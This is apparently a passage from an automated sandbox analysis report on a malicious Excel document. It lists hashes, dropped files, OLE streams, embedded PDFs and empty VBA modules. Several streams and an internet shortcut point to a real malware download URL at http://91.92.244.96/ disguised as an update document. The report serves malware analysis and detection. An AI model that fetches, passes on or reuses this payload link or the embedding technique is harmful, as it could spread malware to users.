SHA-256:	F9EF27008FA3F462F826F8B8D1661B529B8B294D705237723C99D2307B271938
SHA-512:	353719F0C5F2460C134566FCCEE4C03104B95B85F99818AE205D7CC337CADD3B094CC65DD84E1578ADF5B655B894E09BFF10A10C4D4ED8B0B86A269BEE401183
Malicious:	true
Preview:	[InternetShortcut]..URL=http://91.92.244.96/LEO/CLO/microballonupdationrpcessstartedforbabiesupdateveryfastandamazingupdationforentierpctomakeitfasterthan.doC..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

Download File

Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.503835550707525
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyZbHigAWvCGkJU2lln:vdsCkWtyjigDzXKl
MD5:	149A07C771DCBEC7963281041D02A4E6
SHA1:	A0E70DB2FF3DE3B764B29DE2E34241B423F3A473
SHA-256:	3A3A1498C9FD6DA3DCDA7F682BE2E38B72D21F5FBC492AADE492FACCCAA8D387
SHA-512:	2784EC471F04A9625097B967B2FDB42E5FE28F459B7EB6D1F36B656C2B7C26EF32DE50D852CE02198CA88739548C50AD8A471AAF0C856092A878D50931640E3C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...

C:\Users\user\Desktop\~$P018400.xla.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	false
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

Static File Info

General

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Tue Feb 13 00:49:35 2024, Security: 1
Entropy (8bit):	7.70403914300848
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	P018400.xla.xlsx
File size:	570'880 bytes
MD5:	e9ff33ad374e8c0a52fac68e8e9c4fa1
SHA1:	6756634e8cec1f0679ad3b79b64de21497ad8e55
SHA256:	46e9f5dc33458a0c7333508cf6c03b3e298217507b52fcc54d1d43b26488e2c6
SHA512:	049b4021a8ddcd28e175d429551c6e0e2d20f0cae1f75d6ab16915d224d0837c85cab84d7b09c6ff7312f4d5801f1cdead4ed9657d27f26d1be6dd4a713045b2
SSDEEP:	12288:yTkbSEXMcbNedomzED+vw3bVqLMIlesc4LSvIip6qDt0:RSSMMednED+43bVCeJ46ISLt
TLSH:	E3C40150F6828A5BF06247304EF35F9A5329FD42AB638B4B310CF71E3DB07A55A17662
File Content Preview:	........................>.......................................................0...1...2.......{.......o......................................................................................................................................................

File Icon


Icon Hash:	2562ab89a7b7bfbf

Static OLE Info

General

Document Type:	OLE
Number of OLE Files:	1

OLE File "P018400.xla.xlsx"

Indicators

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Summary

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-02-13 00:49:35
Creating Application:	Microsoft Excel
Security:	1

Document Summary

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 97 d9 ae 54 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet2.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 97 d9 00 84 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: Sheet3.cls, Stream Size: 977

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - . 0
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 97 d9 37 ea 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

VBA File Name: ThisWorkbook.cls, Stream Size: 985

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 97 d9 11 57 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Streams

Stream Path: \x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2920681057018664
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . ^ . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

Stream Path: MBD000149AA/\x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	MBD000149AA/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000149AA/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD000149AA/\x1Ole
CLSID:
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 4 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 34 00

Stream Path: MBD000149AA/CONTENTS, File Type: PDF document, version 1.7, 1 pages, Stream Size: 20909

General
Stream Path:	MBD000149AA/CONTENTS
CLSID:
File Type:	PDF document, version 1.7, 1 pages
Stream Size:	20909
Entropy:	7.967116806702583
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 7 . % . 1 0 o b j . < < . / T y p e / C a t a l o g . / P a g e s 2 0 R . / A c r o F o r m 3 0 R . > > . e n d o b j . 4 0 o b j . < < . / P r o d u c e r ( 3 . 0 . 4 \\ ( 5 . 0 . 8 \\ ) ) . / M o d D a t e ( D : 2 0 2 3 0 9 2 2 0 3 2 2 4 8 + 0 2 ' 0 0 ' ) . > > . e n d o b j . 2 0 o b j . < < . / T y p e / P a g e s . / K i d s [ 5 0 R ] . / C o u n t 1 . > > . e n d o b j . 3 0 o b j . < < . / F i e l d s [ ] . / D R 6 0 R . > > . e n d
Data Raw:	25 50 44 46 2d 31 2e 37 0a 25 f6 e4 fc df 0a 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 43 61 74 61 6c 6f 67 0a 2f 50 61 67 65 73 20 32 20 30 20 52 0a 2f 41 63 72 6f 46 6f 72 6d 20 33 20 30 20 52 0a 3e 3e 0a 65 6e 64 6f 62 6a 0a 34 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 50 72 6f 64 75 63 65 72 20 28 33 2e 30 2e 34 20 5c 28 35 2e 30 2e 38 5c 29 20 29 0a 2f 4d 6f 64 44 61 74 65

Stream Path: MBD000149AB/\x1CompObj, File Type: data, Stream Size: 94

General
Stream Path:	MBD000149AB/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000149AB/\x1Ole, File Type: data, Stream Size: 62

General
Stream Path:	MBD000149AB/\x1Ole
CLSID:
File Type:	data
Stream Size:	62
Entropy:	2.7788384466112834
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . . ! . . . . . S h e e t 2 ! O b j e c t 3 .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 2e 00 00 00 04 03 00 00 00 00 00 00 c0 00 00 00 00 00 00 46 02 00 00 00 21 00 10 00 00 00 53 68 65 65 74 32 21 4f 62 6a 65 63 74 20 33 00

Stream Path: MBD000149AB/CONTENTS, File Type: PDF document, version 1.3, 1 pages, Stream Size: 180110

General
Stream Path:	MBD000149AB/CONTENTS
CLSID:
File Type:	PDF document, version 1.3, 1 pages
Stream Size:	180110
Entropy:	7.9525248195720994
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 3 . . 1 0 o b j . . [ / P D F / T e x t / I m a g e B / I m a g e C / I m a g e I ] . . e n d o b j . . 1 2 0 o b j . . < < / L e n g t h 1 8 8 8 / F i l t e r / F l a t e D e c o d e > > s t r e a m . . X . Z M o . 7 . . . P H . & 9 . P b 5 j . . Q . . J . \\ r W * \| 0 D q . r . z ? . , . R . . . D . K P . . ^ < p ! . . . . L ; j . + r ^ . K V . + . a . . . . . Q a % Y } " / W O + ~ & . . > x & e A D & T y T . C . r . : ; ] % . % X / . 7 / S . . . t . . Y N P
Data Raw:	25 50 44 46 2d 31 2e 33 0d 0a 31 20 30 20 6f 62 6a 0d 0a 5b 2f 50 44 46 20 2f 54 65 78 74 20 2f 49 6d 61 67 65 42 20 2f 49 6d 61 67 65 43 20 2f 49 6d 61 67 65 49 5d 0d 0a 65 6e 64 6f 62 6a 0d 0a 31 32 20 30 20 6f 62 6a 0d 0a 3c 3c 20 2f 4c 65 6e 67 74 68 20 31 38 38 38 20 2f 46 69 6c 74 65 72 20 2f 46 6c 61 74 65 44 65 63 6f 64 65 20 3e 3e 20 73 74 72 65 61 6d 20 0d 0a 58 09 ad 5a

Stream Path: MBD000149AC/\x1CompObj, File Type: data, Stream Size: 99

General
Stream Path:	MBD000149AC/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000149AC/Package, File Type: Microsoft Excel 2007+, Stream Size: 18922

General
Stream Path:	MBD000149AC/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	18922
Entropy:	7.528667934708663
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . E o . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e3 45 b7 6f 8c 01 00 00 c0 05 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000149AD/\x1CompObj, File Type: data, Stream Size: 114

General
Stream Path:	MBD000149AD/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Stream Path: MBD000149AD/\x5DocumentSummaryInformation, File Type: data, Stream Size: 708

General
Stream Path:	MBD000149AD/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	708
Entropy:	3.6235698530352805
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . @ . . . . . . . H . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 20 02 00 00 dc 01 00 00 14 00 00 00 01 00 00 00 a8 00 00 00 02 00 00 00 b0 00 00 00 03 00 00 00 bc 00 00 00 0e 00 00 00 c8 00 00 00 0f 00 00 00 d4 00 00 00 04 00 00 00 e0 00 00 00 05 00 00 00

Stream Path: MBD000149AD/\x5SummaryInformation, File Type: data, Stream Size: 23248

General
Stream Path:	MBD000149AD/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	23248
Entropy:	3.027967221315804
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . v i v i e n . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 a0 5a 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 a4 00 00 00 04 00 00 00 b0 00 00 00 05 00 00 00 c0 00 00 00 06 00 00 00 cc 00 00 00 07 00 00 00 d8 00 00 00 08 00 00 00 e4 00 00 00 09 00 00 00 f4 00 00 00

Stream Path: MBD000149AD/Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 97808

General
Stream Path:	MBD000149AD/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	97808
Entropy:	7.365012590664846
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . . . P . 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

Stream Path: MBD000149AE/\x1Ole, File Type: data, Stream Size: 768

General
Stream Path:	MBD000149AE/\x1Ole
CLSID:
File Type:	data
Stream Size:	768
Entropy:	5.641343347318569
Base64 Encoded:	False
Data ASCII:	. . . . . " > . y . . . . . . . . . . . . . . . y . . . K . . . . h . t . t . p . : . / . / . 9 . 1 . . . 9 . 2 . . . 2 . 4 . 4 . . . 9 . 6 . / . L . E . O . / . C . L . O . / . m . i . c . r . o . b . a . l . l . o . n . u . p . d . a . t . i . o . n . r . p . c . e . s . s . s . t . a . r . t . e . d . f . o . r . b . a . b . i . e . s . u . p . d . a . t . e . v . e . r . y . f . a . s . t . a . n . d . a . m . a . z . i . n . g . u . p . d . a . t . i . o . n . f . o . r . e . n . t . i . e . r . p . c
Data Raw:	01 00 00 02 99 d9 05 22 3e 14 9a 79 00 00 00 00 00 00 00 00 00 00 00 00 fa 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b f6 01 00 00 68 00 74 00 74 00 70 00 3a 00 2f 00 2f 00 39 00 31 00 2e 00 39 00 32 00 2e 00 32 00 34 00 34 00 2e 00 39 00 36 00 2f 00 4c 00 45 00 4f 00 2f 00 43 00 4c 00 4f 00 2f 00 6d 00 69 00 63 00 72 00 6f 00 62 00 61 00 6c 00 6c 00 6f 00 6e 00 75 00

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 206748

General
Stream Path:	Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	206748
Entropy:	7.99724644239722
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . / . 6 . . . . . . . . 5 t { B D f H ] . . S . & . . , { . o r . N Q O g J . . . . . . . . . . . . . . \\ . p . . 5 . < U . U 6 L . \| C U W F . . * 5 . . . . . l . = . { v ` . 1 ` j . y w . s . $ E ( 5 . / 4 . X D . ? P e S ] . ) B . . . j a . . . . . . = . . . v . . . . T [ W j y . . . . . . . . p . . . . . . . . . . . . . s . . . . . = . . . . n @ t . . \\ R . . : @ . . . . . . j " . . . . * . . . . . . . . . . . } 1 . . . O j { . . 9 . . . . { 7 j D 6 . N . 1 . . . H . . e
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 e1 01 8f a2 ce 35 74 85 7b fb 91 c1 42 44 88 d6 66 48 5d 84 11 15 53 ae 0f 89 a4 26 00 d8 1d ba 2c 7b cd d1 12 c1 d7 6f 72 01 4e 51 4f bf 67 4a 87 00 00 00 e1 00 02 00 b0 04 c1 00 02 00 18 c4 e2 00 00 00 5c 00 70 00 2e 35 1d 3c b9 55 95 c3 b9 55 9b d7 36 9a 4c 9a 14 7c bd 8f cf 43 55 b5 f6 ee

Stream Path: _VBA_PROJECT_CUR/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 521

General
